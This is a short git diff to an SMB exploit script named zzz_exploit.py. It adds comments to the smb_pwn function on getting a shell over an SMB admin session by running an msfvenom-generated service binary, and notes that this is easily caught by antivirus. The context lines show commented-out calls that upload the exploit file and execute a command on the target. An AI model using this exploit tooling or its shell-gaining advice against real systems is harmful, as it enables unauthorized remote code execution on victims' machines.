diff --git a/zzz_exploit.py b/zzz_exploit.py
index 6b40510..695df6a 100644
--- a/zzz_exploit.py
+++ b/zzz_exploit.py
@@ -898,6 +898,9 @@ def smb_pwn(conn, arch):
 #smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py')
 #service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt')
+ # Note: there are many methods to get shell over SMB admin session
+ # a simple method to get shell (but easily to be detected by AV) is
+ # executing binary generated by "msfvenom -f exe-service ..."
 def smb_send_file(smbConn, localSrc, remoteDrive, remotePath):
 with open(localSrc, 'rb') as fp: